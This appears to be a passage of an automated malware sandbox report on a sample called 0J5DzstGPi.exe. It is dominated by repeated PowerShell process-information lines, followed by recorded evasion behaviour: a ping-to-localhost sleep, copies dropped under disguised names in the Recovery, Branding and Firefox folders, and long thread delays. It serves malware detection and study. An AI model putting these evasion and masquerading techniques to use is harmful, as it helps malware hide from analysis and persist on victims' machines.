Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Memory allocated: 14A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Memory allocated: 1AE90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Memory allocated: DA0000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Memory allocated: 1AAF0000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Memory allocated: 1160000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Memory allocated: 1AB40000 memory reserve \| memory write watch
Source: C:\Recovery\sihost.exe	Memory allocated: F90000 memory reserve \| memory write watch
Source: C:\Recovery\sihost.exe	Memory allocated: 1ABC0000 memory reserve \| memory write watch
Source: C:\Recovery\sihost.exe	Memory allocated: 18E0000 memory reserve \| memory write watch
Source: C:\Recovery\sihost.exe	Memory allocated: 1B3B0000 memory reserve \| memory write watch
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Memory allocated: 2530000 memory reserve \| memory write watch
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Memory allocated: 1A790000 memory reserve \| memory write watch
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Memory allocated: 720000 memory reserve \| memory write watch
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Memory allocated: 1A4D0000 memory reserve \| memory write watch
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Memory allocated: D10000 memory reserve \| memory write watch
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Memory allocated: 1AAF0000 memory reserve \| memory write watch
Source: C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Memory allocated: 13D0000 memory reserve \| memory write watch
Source: C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Memory allocated: 1AED0000 memory reserve \| memory write watch
Source: C:\Recovery\sihost.exe	Memory allocated: 11E0000 memory reserve \| memory write watch
Source: C:\Recovery\sihost.exe	Memory allocated: 1AFC0000 memory reserve \| memory write watch
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Memory allocated: 10D0000 memory reserve \| memory write watch
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Memory allocated: 1ABD0000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Memory allocated: 3080000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Memory allocated: 1B140000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
